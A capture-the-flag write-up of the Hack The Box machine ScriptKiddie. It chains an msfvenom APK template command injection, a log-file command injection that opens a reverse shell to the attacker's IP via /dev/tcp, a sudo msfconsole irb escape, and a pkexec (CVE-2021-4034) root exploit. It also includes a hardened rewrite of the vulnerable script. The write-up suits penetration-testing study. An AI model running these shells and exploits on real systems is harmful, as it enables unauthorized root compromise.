🕵 HTB-Writeup : SCRIPTKIDDIE

Recon

└─$ rustscan -a 10.10.10.226 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

Open 10.10.10.226:22
Open 10.10.10.226:5000

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    syn-ack Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods: 
|_  Supported Methods: GET POST HEAD OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We are facing a Werkzeug web server. On the main page, we have access to three tools:

  • nmap
  • msfvenom
  • searchsploit

Vulnerability

The msfvenom tool here can generate Windows, Unix and Android payloads.

I first used searchsploit and found some known vulnerabilities for Werkzeug.

└─$ searchsploit Werkzeug                              
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
Pallets Werkzeug 0.15.4 - Path Trav | python/webapps/50101.py
Werkzeug - 'Debug Shell' Command Ex | multiple/remote/43905.py
Werkzeug - Debug Shell Command Exec | python/remote/37814.rb
------------------------------------ ---------------------------------

These exploits require access to the debug console page of the Werkzeug server, but we don't have access to it on this box, so they cannot be used.

After some research, I found that the msfvenom tool is vulnerable to an APK template command injection.

I found an article explaining that vulnerability.

msfvenom is vulnerable to command injection when the tool is used to craft an APK file with the -x switch. That option allows msfvenom to use an Android APK as a payload template when building the output file.

We can use the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection module to craft our malicious Android payload template.

msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit() > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit() > set lhost 10.10.16.11
msf6 exploit() > exploit

[+] msf.apk stored at /home/pezzz/.msf4/local/msf.apk

We can now try to generate an APK file using our template.


We get our first shell as kid and can grab the user flag!

└─$ rlwrap nc -lvnp 4444                
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.226] 47136

$ whoami
kid

$ cat /home/kid/user.txt
*************************ec7cb84

We can add our SSH public key to authorized_keys to get SSH access.

Path to the privesc

Local recon

I first ran a LinPEAS scan.

kid@scriptkiddie:~$ ./linpeas.sh -qN > out

# checking sudo version
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560

# Checking last connection
╔══════════╣ Last time logon each user
Username         Port     From             Latest
kid < thats me   pts/0    10.10.16.11      Sat Sep  3 13:34:17 +0000 2022
pwn              pts/1    10.10.14.7       Thu Jan 28 17:52:15 +0000 2021

We find two potentially interesting pieces of information.

First, LinPEAS reports sudo version 1.8.31 and flags the host as vulnerable to CVE-2021-4034 and CVE-2021-3560. Second, we see that the user pwn has logged in in the past from 10.10.14.7. The IP is accessible.

In the /home/pwn directory we find a script:

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

The script reads /home/kid/logs/hackers, takes the third space-separated field of each line as an IP and passes it to an nmap command run through sh -c.

I confirmed this by using the script to create a file with touch; it worked.

Since we have write access to /home/kid/logs/hackers, we can inject arbitrary commands that will be executed with pwn's rights.

Exploiting vulnerabilities

Exploiting pwn script

The text that we're going to put in /home/kid/logs/hackers must satisfy three constraints:

  • a ; at the start of our command, to separate it from the preceding nmap command
  • a # at the end, to comment out the rest of the line and avoid syntax errors
  • two dummy fields before our command, because cut -d' ' -f3- strips the first two space-separated fields

So our line will be the following:

a b ; bash -c '/bin/bash -i >& /dev/tcp/10.10.16.7/8888 0>&1' #
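The script above and the three injection constraints both come down to one defect: the third field of an attacker-writable log is handed to sh -c unvalidated. The following hardened rewrite is an added example (not the box's script); it assumes the same "date time ip" log layout, validates each field as a dotted-quad IPv4 address and passes it to nmap as a single argument instead of through a shell.

```shell
#!/bin/sh
# Hardened rewrite of the pwn user's scanner loop (added example, not the
# original script). Assumes the log keeps the "date time ip" layout, so the
# IP is still the third space-separated field.

# Succeed only when $1 is a bare dotted-quad IPv4 address (each octet <= 255).
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS
    IFS=.
    set -- $1            # split the address into its four octets
    IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Print the validated IPs from log file $1, one per line. Anything else is
# reported on stderr instead of being handed to a shell.
collect_targets() {
    cut -d' ' -f3- "$1" | sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected: %s\n' "$ip" >&2
        fi
    done
}

# Scan each validated IP. nmap receives the IP as one argv entry, never via
# sh -c, so shell metacharacters in the log can no longer become commands.
scan_targets() {
    collect_targets "$1" | while IFS= read -r ip; do
        nmap --top-ports 10 -oN "recon/$ip.nmap" "$ip" >/dev/null 2>&1 &
    done
    wait
}
```

With a constructed log containing a normal entry, a line like the injection above and an out-of-range address, only the well-formed IP reaches nmap; the other two lines are logged as rejected.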

And we now have a shell as pwn:

connect to [10.10.16.7] from (UNKNOWN) [10.10.10.226] 54820
bash: cannot set terminal process group (866): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)

We can see that the user pwn can execute msfconsole as root without a password:

sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

The msfconsole help menu shows that we can obtain a Ruby shell in the current context:

Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context

From this Ruby shell we can call /bin/bash: https://gtfobins.github.io/gtfobins/irb/

Unfortunately we first have to upgrade our shell, since msfconsole fails without a proper terminal:

stty: 'standard input': Inappropriate ioctl for device

I tried adding my SSH key but I don't have the access. Fortunately, a simple python3 -c 'import pty; pty.spawn("/bin/bash")' solved the issue.

We can now exploit the sudo rule:

pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
[...]
msf6 > irb
irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> exec '/bin/bash'
root@scriptkiddie:/home/pwn/.ssh# id
id
uid=0(root) gid=0(root) groups=0(root)

We can now retrieve the root flag.

Exploiting CVEs

I tried to exploit both CVEs reported by LinPEAS.

The first vulnerability (CVE-2021-4034) is a local privilege escalation in polkit's pkexec utility. pkexec "allows an authorized user to execute PROGRAM as another user". According to the NSE description, "the current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands".

A user can manipulate the environment and pass malformed arguments to force pkexec to execute commands: if pkexec is invoked with a null argument, it becomes possible to execute commands set through environment PATH variables. This article explains the vulnerability in more detail.

I found an exploit on GitHub that reproduces those steps.

# compiled exploit w/ gcc
kid@scriptkiddie:~$ gcc exploit.c -o exploit

# execute the exploit
kid@scriptkiddie:~$ ./exploit 
$ whoami
root

$ cat /root/root.txt
*************************fa68e5c

The exploit works! We get a root shell and can grab the flag! :)

Tags

Easy, Internal, Use Of Injection Attacks, Metasploit, Ruby, Penetration Tester Level 1, OS Command Injection, Access Control, Backdoor, Public Vulnerabilities, CVE Exploitation, Sudo Exploitation, Security Tools, Weak Permissions